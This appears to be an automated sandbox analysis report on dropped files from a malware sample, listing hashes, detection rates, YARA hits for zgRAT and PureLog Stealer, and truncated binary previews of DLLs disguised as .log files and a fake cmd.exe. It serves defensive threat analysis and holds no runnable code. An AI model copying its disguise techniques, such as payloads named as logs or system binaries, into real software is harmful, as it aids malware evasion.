Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NMiIKuxG.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\NedIeTjA.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NvkaspdC.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OaRiuQGD.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QXsqPQUy.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\SQHZBNGw.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bIypVceb.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bRVpFOxY.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\cAOXqsEV.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\etdFcppU.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gngVTpTJ.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jXYEVzlL.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\qNclTfFu.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qVMExOgA.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\qejEhBzx.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\texuZkSn.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uLCuFLgt.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\Logs\SettingSync\cmd.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Logs\SettingSync\cmd.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Logs\SettingSync\cmd.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Windows\Logs\SettingSync\ebf1f9fa8afd6d

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (474), with no line terminators
Category:	dropped
Size (bytes):	474
Entropy (8bit):	5.848816747663649
Encrypted:	false
SSDEEP:	12:TMpUJDQv5lYFX5XpEYH/bEWVumbm3xTs8uFi0iraR4o:gpQDQfGhbXpa5Vvq
MD5:	91B7FBF0EF030599B329336E6171F3A9
SHA1:	00213178B626BA8C381CFCE60B9DD5D81EA1F309
SHA-256:	21D083C863050A376C07F2AADCB8B36F86FE1EA20F8DBA42644288DD49B2B152
SHA-512:	26A7530CFB7ADCCB39F793AB7C8F08CC5D09C8452DBFC1966F05E9D4FBAA06BE5EB847FB00BE1818E81A93A15492B63CDFBDE4E13AE66F42001AE1836646D227
Malicious:	false
Preview:	7KE7nxLBk4Gf6vrmQyql77FptYOcRRFCwJQFV2wrsUQ5PuYTyUrl0df9EZOPistSzEswflRXC83nrKa894n7jdLToRA5ohI9l7GLBmyMDTj1k2S49PPoFwsW2ZHNlVsez4CtEO7XGb4P3Utw9F6ZRe3yPtSmekkrkEBp0i0uR2ho2ccipUOgZTNVANeU6U2f0MoySD6aOLHZ7P5wQu6JWESR1qpmEgy69ByqxoQmYxRNLxXuRsDLYsIv4X6lYUWsXLZ5bP8meUvjxEGES4UWcmiQ2CvaroOEai0AXcTCtbrE7j7zR2Sd9AQumICYdh4zGrIONFq0lSmA5eTTF5JyWuEaSGXPZ5iMg17QatmLMb2rXPyIztTiYGdVmr6HsbbpuZeDgC2WT7m41XCDRPZplAxaYmntwedv9M67uumw07OadidPo2zcBwEumDo3ZJjye15paEShmmyovX70IYE3pAtNIM

C:\Windows\Resources\42af1c969fbb7b

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (982), with no line terminators
Category:	dropped
Size (bytes):	982
Entropy (8bit):	5.907285350857826
Encrypted:	false
SSDEEP:	24:E36nzW8u4Um8NHew3czaMOioGVc6slqUZ/V2V+qOIFW5e:gA68u4Um8Qw3cf5bVc6sIcV2V+Nf5e
MD5:	1C5C82344AEA8EBAD2DBD6176A58FDC5
SHA1:	EAB17CBEB5EE84DD6F12504B21D254602E65A85F
SHA-256:	21F0A785C267C6D9B1386C0A6DF2BA9F2D03CE57184CAE86324956298875C5D7
SHA-512:	87156C843B599388F6A84F00F094B2148CB26D7F0747453838FF6AFCC8AB4A8898FB72EC4AF8EE2790E960FBB32FAA1D8ED94F8C8661CD3C0590D2596192BE91
Malicious:	false
